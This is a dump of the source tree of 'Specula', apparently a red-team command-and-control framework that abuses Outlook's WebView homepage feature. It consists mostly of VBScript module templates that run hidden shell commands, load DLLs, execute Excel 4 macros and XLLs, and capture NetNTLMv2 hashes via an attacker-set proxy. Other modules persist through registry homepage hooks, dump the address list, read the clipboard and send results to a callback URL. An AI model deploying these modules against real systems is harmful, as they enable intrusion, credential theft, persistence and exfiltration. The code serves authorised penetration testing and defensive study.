├── api ├── README.md ├── SpeculaApi │ ├── SpeculaApi.rgs │ ├── SpeculaApi.rc │ ├── SpeculaApips.def │ ├── pch.cpp │ ├── SpeculaApi.def │ ├── targetver.h │ ├── dllmain.h │ ├── dllmain.cpp │ ├── framework.h │ ├── resource.h │ ├── pch.h │ ├── Sepcula.rgs │ ├── SpeculaApi.idl │ └── Sepcula.h └── SpeculaApiPS │ └── SpeculaApiPS.vcxproj.filters ├── release_history.txt ├── requirements.txt ├── data └── payloads │ └── api │ ├── SpeculaApi.dll │ └── SpeculaApi.x64.dll ├── README.md ├── functions ├── operation │ ├── file │ │ ├── create_dir.txt │ │ ├── put_file.txt │ │ ├── list_dir.txt │ │ ├── get_file.txt │ │ ├── check_fileexist.txt │ │ ├── cat_file.txt │ │ ├── move_file.txt │ │ ├── delete_file.txt │ │ ├── create_shortcut.txt │ │ ├── delete_dir.txt │ │ ├── copy_file.txt │ │ ├── copy_dir.txt │ │ ├── list_shortcutinfo.py │ │ ├── download_filehttp.txt │ │ ├── delete_file.py │ │ ├── check_filehash.txt │ │ ├── check_fileexist.py │ │ ├── check_filearch.py │ │ ├── list_acl.py │ │ ├── delete_dir.py │ │ ├── create_dir.py │ │ ├── list_shortcutinfo.txt │ │ ├── copy_file.py │ │ ├── move_file.py │ │ ├── check_filehash.py │ │ ├── copy_dir.py │ │ ├── download_filehttp.py │ │ ├── cat_file.py │ │ ├── zip_content.py │ │ └── check_filearch.txt │ ├── registry │ │ ├── delkeyhkcuregistry.txt │ │ ├── delvaluehkcuregistry.txt │ │ ├── getallkeysregistry.txt │ │ ├── getallvaluesregistry.txt │ │ ├── setvaluehkcuregistry.txt │ │ ├── getvalueregistry.txt │ │ ├── delkeyhkcuregistry.py │ │ └── delvaluehkcuregistry.py │ ├── outlook │ │ ├── stop_outlook.txt │ │ ├── dump_gal.txt │ │ ├── get_emailaddress.txt │ │ ├── changeview_outlookfolder.txt │ │ ├── send_mail.txt │ │ ├── change_outlookfolder.txt │ │ ├── stop_outlook.py │ │ ├── read_contacts.py │ │ ├── get_emailaddress.py │ │ ├── list_overview.py │ │ ├── list_overview.txt │ │ ├── list_notifications.txt │ │ ├── list_notifications.py │ │ ├── read_contacts.txt │ │ ├── read_calendar.py │ │ ├── changeview_outlookfolder.py │ │ ├── read_calendar.txt │ │ ├── 
read_email.txt │ │ ├── savedraft_filemail.txt │ │ └── read_emailnamedfolder.py │ ├── specula │ │ ├── remove_allowlongscriptruntime.txt │ │ ├── set_allowlongscriptruntime.txt │ │ ├── remove_allowlongscriptruntime.py │ │ └── set_allowlongscriptruntime.py │ └── network │ │ ├── nslookup.txt │ │ ├── netstat.py │ │ ├── netstat.txt │ │ └── nslookup.py ├── api │ ├── run_shell.txt │ ├── verify_api.txt │ ├── load_dll.txt │ ├── load_dll.py │ ├── run_shell.py │ ├── verify_api.py │ └── remove_api.txt ├── enumerate │ ├── host │ │ ├── list_clipboard.txt │ │ ├── list_recentcommands.txt │ │ ├── list_timezone.txt │ │ ├── list_printers.txt │ │ ├── list_startmenu.txt │ │ ├── list_officearch.txt │ │ ├── list_hostsfile.txt │ │ ├── list_windowsarch.txt │ │ ├── list_printers.py │ │ ├── list_environmentvariables.txt │ │ ├── list_windowsversion.txt │ │ ├── list_clipboard.py │ │ ├── list_hotfixes.txt │ │ ├── list_mappeddrives.py │ │ ├── list_services.txt │ │ ├── list_startmenu.py │ │ ├── list_mappeddrives.txt │ │ ├── list_scheduledtasks.py │ │ ├── list_networkcardinfo.py │ │ ├── list_boottime.py │ │ ├── list_ntdomaininfo.py │ │ ├── list_hotfixes.py │ │ ├── list_recyclebin.py │ │ ├── list_installedpowershell.py │ │ ├── list_localusers.py │ │ ├── list_recentfiles.py │ │ ├── list_recentfiles.txt │ │ ├── list_networklogon.py │ │ ├── list_hostsfile.py │ │ ├── list_services.py │ │ ├── list_boottime.txt │ │ ├── list_applocker.py │ │ ├── list_logging.py │ │ ├── list_windowsversion.py │ │ ├── list_timezone.py │ │ ├── list_windowsarch.py │ │ ├── list_processes.py │ │ ├── list_basic.txt │ │ ├── list_officearch.py │ │ ├── list_installedapps.py │ │ ├── list_ntdomaininfo.txt │ │ ├── list_networkcardinfo.txt │ │ ├── list_basic.py │ │ ├── list_installedpowershell.txt │ │ ├── list_networklogon.txt │ │ ├── list_amsiproviders.py │ │ ├── list_iprouting.py │ │ ├── list_amsiproviders.txt │ │ ├── list_localadmins.py │ │ ├── list_gpp.py │ │ ├── list_processes.txt │ │ ├── list_recentcommands.py │ │ ├── 
list_environmentvariables.py │ │ ├── list_whoami.py │ │ ├── list_localadmins.txt │ │ ├── list_iprouting.txt │ │ ├── list_servicepermissions.py │ │ ├── list_installeddotnet.py │ │ ├── list_localusers.txt │ │ ├── list_recyclebin.txt │ │ ├── list_gpp.txt │ │ ├── list_applocker.txt │ │ ├── list_installedapps.txt │ │ └── list_autoruns.py │ └── ldap │ │ ├── list_computers.py │ │ ├── list_domaininfo.py │ │ ├── list_users.py │ │ ├── list_lapspassword.py │ │ ├── list_passwordpolicy.py │ │ ├── list_passwordnotrequired.py │ │ ├── list_asreproast.py │ │ ├── list_user.py │ │ ├── list_computer.py │ │ ├── list_addcomputertodomain.py │ │ ├── ldap_query.txt │ │ ├── list_domaininfo.txt │ │ ├── list_users.txt │ │ ├── list_asreproast.txt │ │ ├── list_passwordnotrequired.txt │ │ ├── list_computers.txt │ │ ├── list_lapspassword.txt │ │ ├── list_user.txt │ │ ├── list_passwordpolicy.txt │ │ └── list_computer.txt ├── trolling │ ├── set_clipboard.txt │ ├── play_voice.txt │ ├── set_clipboard.py │ └── play_voice.py └── execute │ └── host │ ├── application.txt │ ├── execute_registerxll.txt │ ├── execute_excel4macro.txt │ ├── capture_netntlmv2.txt │ ├── spawnproc_explorer.txt │ ├── migrate_homepage.txt │ ├── wscriptshell.txt │ ├── set_calendarhomepagehook.txt │ ├── wmi_execute.txt │ ├── wmi_killprocpid.txt │ ├── wmi_killprocname.txt │ ├── cmd.txt │ ├── wscriptshell.py │ ├── remove_homepage.py │ ├── cmd.py │ ├── wmi_killprocpid.py │ ├── wmi_execute.py │ ├── execute_registerxll.py │ ├── wmi_killprocname.py │ ├── spawnproc_explorer.py │ ├── migrate_homepage.py │ ├── uac-sdclt.txt │ ├── remove_homepage.txt │ ├── uac-sdclt.py │ ├── application.py │ ├── set_calendarhomepagehook.py │ └── execute_excel4macro.py ├── helperFunctions ├── base_template.txt ├── createstream.txt ├── Delregvalue_hkcu.txt ├── Delregkey_hkcu.txt ├── Getallregkeys.txt ├── dir_creator.txt ├── HexToBytes.txt ├── Setregvalue_hkcu.txt └── base64.txt ├── lib ├── tab_completers │ └── generic.py ├── core │ ├── spectaskbook.py │ └── 
utility.py ├── handlers │ ├── blacklist.html │ ├── specpayload.py │ ├── dev_blank.html │ ├── specapplication.py │ ├── base.html │ └── redirect_template.html ├── modhandlers │ └── generic.py └── validators │ └── files.py ├── .gitignore ├── hiddenFunctions ├── download_file.txt ├── upload_file.txt └── upload_file.py ├── Taskbooks ├── example.py └── enum_installed_software.py ├── ssl └── ssl-cert-snakeoil.pem └── CONTRIBUTING.md /api/README.md: -------------------------------------------------------------------------------- 1 | # SpeculaApi -------------------------------------------------------------------------------- /api/SpeculaApi/SpeculaApi.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | } 4 | -------------------------------------------------------------------------------- /release_history.txt: -------------------------------------------------------------------------------- 1 | # BUG LIST / KNOWN STUFF: 2 | 3 | VERSION 1.0 4 | Initial Public Release 5 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | urllib3 2 | tornado 3 | requests 4 | jinja2 5 | pyopenssl 6 | pycryptodome 7 | pefile 8 | -------------------------------------------------------------------------------- /api/SpeculaApi/SpeculaApi.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trustedsec/specula/HEAD/api/SpeculaApi/SpeculaApi.rc -------------------------------------------------------------------------------- /data/payloads/api/SpeculaApi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trustedsec/specula/HEAD/data/payloads/api/SpeculaApi.dll -------------------------------------------------------------------------------- /data/payloads/api/SpeculaApi.x64.dll: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/trustedsec/specula/HEAD/data/payloads/api/SpeculaApi.x64.dll -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Getting-started information and guidance on developing your own modules are available on the [wiki](https://github.com/trustedsec/specula/wiki) 2 | -------------------------------------------------------------------------------- /functions/operation/file/create_dir.txt: -------------------------------------------------------------------------------- 1 | Function create_dir() 2 | On error resume next 3 | create_dir = dir_creator({{directory}}) 4 | End Function -------------------------------------------------------------------------------- /helperFunctions/base_template.txt: -------------------------------------------------------------------------------- 1 | 2 | Ohm = "" 3 | Ohm = crypthelper({{ENTRY}}(), ay, True) 4 | rul = requestpage("{{ CALLBACKURL }}", chr(34) & Ohm & chr(34)) -------------------------------------------------------------------------------- /functions/operation/registry/delkeyhkcuregistry.txt: -------------------------------------------------------------------------------- 1 | Function DelKey_HKCU_Registry() 2 | On Error Resume Next 3 | DelKey_HKCU_Registry = DelRegKey_HKCU({{PathToKey}}) 4 | End Function 5 | -------------------------------------------------------------------------------- /api/SpeculaApi/SpeculaApips.def: -------------------------------------------------------------------------------- 1 | 2 | LIBRARY 3 | 4 | EXPORTS 5 | DllGetClassObject PRIVATE 6 | DllCanUnloadNow PRIVATE 7 | DllRegisterServer PRIVATE 8 | DllUnregisterServer PRIVATE 9 | -------------------------------------------------------------------------------- /functions/operation/outlook/stop_outlook.txt: 
-------------------------------------------------------------------------------- 1 | Function Stop_Outlook() 2 | On Error Resume Next 3 | window.external.OutlookApplication.Quit() 4 | Stop_Outlook = "Stop Outlook sent" 5 | End Function -------------------------------------------------------------------------------- /functions/operation/registry/delvaluehkcuregistry.txt: -------------------------------------------------------------------------------- 1 | Function DelValue_HKCU_Registry() 2 | On Error Resume Next 3 | DelValue_HKCU_Registry = DelRegValue_HKCU({{PathToKey}}, {{Valuename}}) 4 | End Function 5 | -------------------------------------------------------------------------------- /functions/operation/registry/getallkeysregistry.txt: -------------------------------------------------------------------------------- 1 | Function GetAllKeysRegistry() 2 | On Error Resume Next 3 | GetAllKeysRegistry = GetAllRegKeys({{Root}}, {{PathToKey}}, {{Arch}}, {{RootInteger}}) 4 | End Function 5 | -------------------------------------------------------------------------------- /api/SpeculaApi/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 
6 | -------------------------------------------------------------------------------- /functions/operation/registry/getallvaluesregistry.txt: -------------------------------------------------------------------------------- 1 | Function GetAllValuesRegistry() 2 | On Error Resume Next 3 | GetAllValuesRegistry = Getallregvalues({{Root}}, {{PathToKey}}, {{Arch}}, {{RootInteger}}) 4 | End Function 5 | -------------------------------------------------------------------------------- /functions/operation/registry/setvaluehkcuregistry.txt: -------------------------------------------------------------------------------- 1 | Function SetValue_HKCU_Registry() 2 | On Error Resume Next 3 | SetValue_HKCU_Registry = SetRegValue_HKCU({{PathToKey}}, {{RegType}}, {{ValueName}}, {{Value}}) 4 | End Function -------------------------------------------------------------------------------- /lib/tab_completers/generic.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | def tab_choice(val, line, **kwargs): 4 | results = [] 5 | for key in kwargs['choices']: 6 | if key.startswith(val): 7 | results.append(key) 8 | return results -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.db 2 | configoptions.py 3 | specConfig.ini 4 | DefaultBlacklist.txt 5 | .vscode/ 6 | specula_log.txt 7 | weblog.log 8 | operator_log.txt 9 | agent_data/ 10 | payloadhosting/ 11 | venv/ 12 | *.pyc 13 | -------------------------------------------------------------------------------- /functions/operation/file/put_file.txt: -------------------------------------------------------------------------------- 1 | Function put_file() 2 | Set fso = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 3 | Set File = fso.GetFile({{destination}}) 4 | put_file = File.size 5 | End Function 
-------------------------------------------------------------------------------- /functions/operation/outlook/dump_gal.txt: -------------------------------------------------------------------------------- 1 | Function dump_gal() 2 | on error resume next 3 | Set GAL = window.external.OutlookApplication.GetNameSpace("MAPI").GetGlobalAddressList().AddressEntries 4 | dump_gal = GAL.Count 5 | End Function -------------------------------------------------------------------------------- /functions/api/run_shell.txt: -------------------------------------------------------------------------------- 1 | Function run_shell_api() 2 | on error resume next 3 | Set SpeculaApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula") 4 | run_shell_api = SpeculaApi.RunShell("{{cmd}}") 5 | End Function -------------------------------------------------------------------------------- /functions/operation/file/list_dir.txt: -------------------------------------------------------------------------------- 1 | Function list_dir() 2 | On error resume next 3 | list_dir = dir_lister({{directory}}, {{depth}}, {{recurselevels}}, {{filetype}}, {(unknown)}, {{nodirectories}}, {{sizeformat}}, {{nofiles}}) 4 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/get_emailaddress.txt: -------------------------------------------------------------------------------- 1 | Function get_emailaddress() 2 | on error resume next 3 | Set folder = (window.external.OutlookApplication.GetNameSpace("MAPI")) 4 | get_emailaddress = folder.Folders(1).Folderpath 5 | End Function -------------------------------------------------------------------------------- /functions/operation/registry/getvalueregistry.txt: -------------------------------------------------------------------------------- 1 | Function GetValueRegistry() 2 | On Error Resume Next 3 | GetValueRegistry = GetRegValue({{Root}}, {{PathToKey}}, {{ValueName}}, {{Arch}}, 
{{RootInteger}}, {{WMIOperation}}) 4 | End Function 5 | -------------------------------------------------------------------------------- /api/SpeculaApi/SpeculaApi.def: -------------------------------------------------------------------------------- 1 | ; SpeculaApi.def : Declares the module parameters. 2 | 3 | LIBRARY 4 | 5 | EXPORTS 6 | DllCanUnloadNow PRIVATE 7 | DllGetClassObject PRIVATE 8 | DllRegisterServer PRIVATE 9 | DllUnregisterServer PRIVATE 10 | DllInstall PRIVATE 11 | -------------------------------------------------------------------------------- /functions/operation/file/get_file.txt: -------------------------------------------------------------------------------- 1 | Function get_file() 2 | On Error Resume Next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | Set file = fs.GetFile({{file}}) 5 | if IsNull(file) Then Exit Function 6 | get_file = file.size 7 | End Function -------------------------------------------------------------------------------- /lib/core/spectaskbook.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class SpecTaskBook(SpecModule): 5 | def __init__(self): 6 | self.entry = "None" 7 | self.depends = [] 8 | super().__init__(None) # we inherit the base properties of a module 9 | 10 | 11 | -------------------------------------------------------------------------------- /functions/api/verify_api.txt: -------------------------------------------------------------------------------- 1 | Function api_verify() 2 | On error resume next 3 | Set specApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula") 4 | If IsObject(specApi) Then 5 | api_verify = True 6 | else 7 | api_verify = False 8 | End if 9 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_clipboard.txt: 
-------------------------------------------------------------------------------- 1 | Function list_clipboard() 2 | On error resume next 3 | Set html = window.external.OutlookApplication.CreateObject("htmlfile") 4 | text = html.ParentWindow.ClipboardData.GetData("text") 5 | list_clipboard = "Clipboard data retrieved: " & vbCrLf & text 6 | End Function -------------------------------------------------------------------------------- /functions/api/load_dll.txt: -------------------------------------------------------------------------------- 1 | Function load_dll 2 | on error resume next 3 | Set SpeculaApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula") 4 | if SpeculaApi.LoadDll("{{dll}}") = 1 Then 5 | load_dll = "True" 6 | Else 7 | load_dll = "False" 8 | End If 9 | End Function 10 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_recentcommands.txt: -------------------------------------------------------------------------------- 1 | Function list_recentcommands() 2 | On error resume next 3 | list_recentcommands = "RECENT COMMANDS:" & vbCrLf 4 | list_recentcommands = list_recentcommands & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU", 64, 2147483649) 5 | End Function -------------------------------------------------------------------------------- /functions/trolling/set_clipboard.txt: -------------------------------------------------------------------------------- 1 | Function set_clipboard() 2 | On error resume next 3 | Set html = window.external.OutlookApplication.CreateObject("htmlfile") 4 | text = html.ParentWindow.ClipboardData.SetData("text", {{clipboardtext}}) 5 | set_clipboard = "Clipboard data set to: " & {{clipboardtext}} 6 | End Function -------------------------------------------------------------------------------- /functions/execute/host/application.txt: 
-------------------------------------------------------------------------------- 1 | Function Execute_Application() 2 | On Error Resume Next 3 | Set app = window.external.OutlookApplication.CreateObject({{com_application}}) 4 | app.Visible = false 5 | Execute_Application = "Command executed: OutlookApplication.CreateObject(" & {{com_application}} & ")" 6 | End Function 7 | -------------------------------------------------------------------------------- /functions/trolling/play_voice.txt: -------------------------------------------------------------------------------- 1 | Function play_voice() 2 | On error resume next 3 | Set speech = window.external.OutlookApplication.CreateObject("sapi.spvoice") 4 | Set speech.Voice = speech.GetVoices.Item({{voicegender}}) 5 | speech.speak{{speaktext}} 6 | play_voice = "Your speaktext was sent to the speaker as voice. Mohahaha" 7 | End Function -------------------------------------------------------------------------------- /functions/execute/host/execute_registerxll.txt: -------------------------------------------------------------------------------- 1 | Function execute_registerxll() 2 | On Error Resume Next 3 | Set excel = window.external.OutlookApplication.CreateObject("Excel.Application") 4 | excel.Visible = false 5 | return_data = excel.RegisterXLL({{input}}) 6 | execute_registerxll = "XLL Executed: " & return_data 7 | End Function -------------------------------------------------------------------------------- /functions/operation/specula/remove_allowlongscriptruntime.txt: -------------------------------------------------------------------------------- 1 | Function RemoveAllowLongScriptRuntime() 2 | On error resume next 3 | te = DelRegValue_HKCU("Software\Microsoft\Internet Explorer\Styles", "MaxScriptStatements") 4 | RemoveAllowLongScriptRuntime = "HKCU\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements has been removed" 5 | End Function 
-------------------------------------------------------------------------------- /api/SpeculaApi/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /functions/execute/host/execute_excel4macro.txt: -------------------------------------------------------------------------------- 1 | Function execute_excel4macro() 2 | On Error Resume Next 3 | Set excel = window.external.OutlookApplication.CreateObject("Excel.Application") 4 | excel.Visible = false 5 | return_data = excel.ExecuteExcel4Macro("CALL({{input}})") 6 | execute_excel4macro = "Data returned: " & return_data 7 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/changeview_outlookfolder.txt: -------------------------------------------------------------------------------- 1 | Function changeview_outlookfolder() 2 | on error resume next 3 | Set folder = window.external.OutlookApplication.GetNameSpace("MAPI").GetDefaultFolder({{ folder }}) 4 | Set window.external.OutlookApplication.ActiveExplorer.CurrentFolder = folder 5 | changeview_outlookfolder = "Changed View to: " & folder 6 | End Function -------------------------------------------------------------------------------- /api/SpeculaApi/dllmain.h: -------------------------------------------------------------------------------- 1 | // dllmain.h : Declaration of module class. 
2 | 3 | class CSpeculaApiModule : public ATL::CAtlDllModuleT< CSpeculaApiModule > 4 | { 5 | public : 6 | DECLARE_LIBID(LIBID_SpeculaApiLib) 7 | DECLARE_REGISTRY_APPID_RESOURCEID(IDR_SPECULAAPI, "{5be8ef76-6253-482a-926e-d1d877de3b63}") 8 | }; 9 | 10 | extern class CSpeculaApiModule _AtlModule; 11 | -------------------------------------------------------------------------------- /functions/execute/host/capture_netntlmv2.txt: -------------------------------------------------------------------------------- 1 | Function capture_netntlmv2() 2 | On Error Resume Next 3 | Set oHTTP = window.external.OutlookApplication.CreateObject("MSXML2.ServerXMLHTTP.6.0") 4 | oHTTP.SetProxy 2, {{ webserver_address }}, "*" 5 | oHTTP.setRequestHeader "User-Agent", {{ useragent }} 6 | oHTTP.open "GET", {{ url }}, False 7 | oHTTP.send 8 | End Function -------------------------------------------------------------------------------- /functions/operation/file/check_fileexist.txt: -------------------------------------------------------------------------------- 1 | Function check_fileexist() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | if fs.FileExists({{file}}) Then 5 | check_fileexist = "File Exist: " & {{file}} & " - True" 6 | else 7 | check_fileexist = "File Exist: " & {{file}} & " - False" 8 | End If 9 | End Function -------------------------------------------------------------------------------- /helperFunctions/createstream.txt: -------------------------------------------------------------------------------- 1 | Function CreateStream(hex_string) 2 | Dim TEMPdec, TEMPstm 3 | Set TEMPstm = window.external.OutlookApplication.CreateObject("System.IO.MemoryStream") 4 | TEMPdec = HexToBytes(hex_string) 5 | 6 | For Each i In TEMPdec 7 | TEMPstm.WriteByte i 8 | Next 9 | TEMPstm.Position = 0 10 | Set CreateStream = TEMPstm 11 | End Function 12 | 13 | 14 | 
-------------------------------------------------------------------------------- /functions/execute/host/spawnproc_explorer.txt: -------------------------------------------------------------------------------- 1 | Function Spawn_Explorer() 2 | On Error Resume Next 3 | set app = window.external.OutlookApplication.CreateObject("Shell.Application").Windows 4 | set appobj = app.item() 5 | appobj.Document.Application.ShellExecute {{command}}, {{arguments}}, "", "", 0 6 | Spawn_Explorer = "Command spawned under explorer: " & {{command}} & " " & {{arguments}} 7 | End Function 8 | -------------------------------------------------------------------------------- /functions/execute/host/migrate_homepage.txt: -------------------------------------------------------------------------------- 1 | Function Execute_MigrateHomepage() 2 | On Error Resume Next 3 | version = left(window.external.OutlookApplication.Version,4) 4 | basepath = "software\microsoft\office\" + version + "\outlook\webview\inbox" 5 | SetValue_HKCU_Registry = SetRegValue_HKCU(basepath, "REG_SZ", "URL", {{homepageurl}}) 6 | Execute_MigrateHomepage = "Registry updated to point to new Specula server" 7 | End Function -------------------------------------------------------------------------------- /functions/operation/specula/set_allowlongscriptruntime.txt: -------------------------------------------------------------------------------- 1 | Function AllowLongScriptRuntime() 2 | On error resume next 3 | te = SetRegValue_HKCU("Software\Microsoft\Internet Explorer\Styles", "REG_DWORD", "MaxScriptStatements", "4294967295") 4 | AllowLongScriptRuntime = "HKCU\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements set to 0xffffffff to allow long script runtime - restart Outlook for it to take effect" 5 | End Function -------------------------------------------------------------------------------- /helperFunctions/Delregvalue_hkcu.txt: -------------------------------------------------------------------------------- 
1 | Function DelRegValue_HKCU(PathToKey, ValueName) 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | objreg.DeleteValue 2147483649, PathToKey, ValueName 6 | DelRegValue_HKCU = ValueName & " Deleted successfully under " & PathToKey 7 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_timezone.txt: -------------------------------------------------------------------------------- 1 | Function list_timezone() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | objreg.GetStringValue 2147483650, "SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "TimeZoneKeyName", strtimezone 6 | list_timezone = strtimezone 7 | End Function -------------------------------------------------------------------------------- /lib/handlers/blacklist.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Outlook 6 | 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /functions/operation/outlook/send_mail.txt: -------------------------------------------------------------------------------- 1 | Function send_mail() 2 | on error resume next 3 | Set objMail = window.external.OutlookApplication.CreateItem(0) 4 | objMail.to = {{ recipient }} 5 | objMail.Subject = {{ subject }} 6 | objMail.Body = {{ body }} 7 | 'objMail.Attachments.Add(NewName) 8 | objMail.DeleteAfterSubmit = {{ delete_after_sent }} 9 | objMail.Send 10 | send_mail = "Sent mail to:" & {{ recipient }} 11 | End Function -------------------------------------------------------------------------------- /functions/execute/host/wscriptshell.txt: 
-------------------------------------------------------------------------------- 1 | Function Execute_WscriptShell() 2 | On Error Resume Next 3 | Const HIDDEN_WINDOW = 0 4 | Set ws = window.external.OutlookApplication.CreateObject("Wscript.shell") 5 | 6 | inetret = ws.Run({{command}}, 0, false) 7 | If intret <> 0 Then 8 | Execute_WscriptShell = "Error running program" 9 | End If 10 | Execute_WscriptShell = "Command Executed: " & {{command}} & vbCrLf & intret 11 | End Function -------------------------------------------------------------------------------- /hiddenFunctions/download_file.txt: -------------------------------------------------------------------------------- 1 | Function download_file() 2 | On Error Resume Next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | Set file = fs.GetFile({{file}}) 5 | if IsNull(file) Then Exit Function 6 | With file.OpenAsTextStream() 7 | .Skip({{startloc}}) 8 | readBinary = .Read({{chunksize}}) 9 | .Close 10 | End With 11 | download_file = readBinary 12 | End Function -------------------------------------------------------------------------------- /functions/execute/host/set_calendarhomepagehook.txt: -------------------------------------------------------------------------------- 1 | Function set_calendarhomepagehook() 2 | On Error Resume Next 3 | version = left(window.external.OutlookApplication.Version,4) 4 | basepath = "software\microsoft\office\" + version + "\outlook\webview\calendar" 5 | SetValue_HKCU_Registry = SetRegValue_HKCU(basepath, "REG_SZ", "URL", {{homepageurl}}) 6 | set_calendarhomepagehook = "Specula hook added to calendar webview - url: " & {{homepageurl}} 7 | End Function -------------------------------------------------------------------------------- /functions/operation/file/cat_file.txt: -------------------------------------------------------------------------------- 1 | Function cat_file() 2 | On error resume next 3 | Set fs = 
window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | If fs.FileExists({{file}}) = True Then 5 | set ReadFile = fs.OpenTextFile({{file}}, 1) 6 | content = ReadFile.ReadAll 7 | else 8 | content = "File not found" 9 | End If 10 | cat_file = "Content of file " & {{file}} & ":" & vbCrLf & content 11 | End Function -------------------------------------------------------------------------------- /functions/operation/file/move_file.txt: -------------------------------------------------------------------------------- 1 | Function move_file() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | if fs.FileExists({{file}}) Then 5 | fs.MoveFile {{file}}, {{destination}} 6 | move_file = "Move File: " & {{file}} & " to " & {{destination}} 7 | else 8 | move_file = "Move File: File Does Exist Exist: " & {{file}} 9 | End If 10 | End Function -------------------------------------------------------------------------------- /lib/handlers/specpayload.py: -------------------------------------------------------------------------------- 1 | import tornado 2 | from urllib.parse import urlparse 3 | from lib.core.setup import gconfig 4 | 5 | class PayloadHandler(tornado.web.StaticFileHandler): 6 | def set_default_headers(self): 7 | self.set_header('Server', gconfig.SERVER_HEADER) 8 | 9 | #def write_error(self, status_code, **kwargs): 10 | # if status_code == 404: 11 | # self.redirect('http://example.com') # Fetching a default resource 12 | -------------------------------------------------------------------------------- /api/SpeculaApi/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Implementation of DllMain. 
2 | 3 | #include "pch.h" 4 | #include "framework.h" 5 | #include "resource.h" 6 | #include "SpeculaApi_i.h" 7 | #include "dllmain.h" 8 | 9 | CSpeculaApiModule _AtlModule; 10 | 11 | // DLL Entry Point 12 | extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) 13 | { 14 | hInstance; 15 | return _AtlModule.DllMain(dwReason, lpReserved); 16 | } 17 | -------------------------------------------------------------------------------- /functions/operation/outlook/change_outlookfolder.txt: -------------------------------------------------------------------------------- 1 | Function change_outlookfolder() 2 | on error resume next 3 | Value = {{ hidden }} 4 | PropName = "http://schemas.microsoft.com/mapi/proptag/0x10F4000B" 5 | Set folder = (window.external.OutlookApplication.GetNameSpace("MAPI")).GetDefaultFolder({{ folder }}) 6 | Set oPA = folder.PropertyAccessor 7 | oPA.SetProperty PropName, Value 8 | change_outlookfolder = "Folder: " & folder & " - Hidden set to: " & Value 9 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_printers.txt: -------------------------------------------------------------------------------- 1 | Function list_printers() 2 | On error resume next 3 | Set wsh = window.external.OutlookApplication.CreateObject("Wscript.Network") 4 | Set printers = wsh.EnumPrinterConnections 5 | For i = 0 to printers.Count - 1 Step 2 6 | output = output & "Printername: " & printers.Item(i+1) & " - Port: " & printers.Item(i) & vbCrLf 7 | Next 8 | list_printers = "Found " & printers.count & " printers:" & vbCrLf & output 9 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_startmenu.txt: -------------------------------------------------------------------------------- 1 | Function list_startmenu() 2 | On error resume next 3 | Set objLocator = 
window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set colItems = objWMIService.ExecQuery("Select Name from Win32_LogicalProgramGroupItem") 6 | 7 | For Each objItem in colItems 8 | list_startmenu = list_startmenu & objItem.Name & vbCrLF 9 | Next 10 | End Function -------------------------------------------------------------------------------- /api/SpeculaApi/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef STRICT 4 | #define STRICT 5 | #endif 6 | 7 | #include "targetver.h" 8 | 9 | #define _ATL_APARTMENT_THREADED 10 | 11 | #define _ATL_NO_AUTOMATIC_NAMESPACE 12 | 13 | #define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit 14 | 15 | 16 | #define ATL_NO_ASSERT_ON_DESTROY_NONEXISTENT_WINDOW 17 | 18 | #include "resource.h" 19 | #include 20 | #include 21 | #include 22 | -------------------------------------------------------------------------------- /functions/operation/file/delete_file.txt: -------------------------------------------------------------------------------- 1 | Function delete_file() 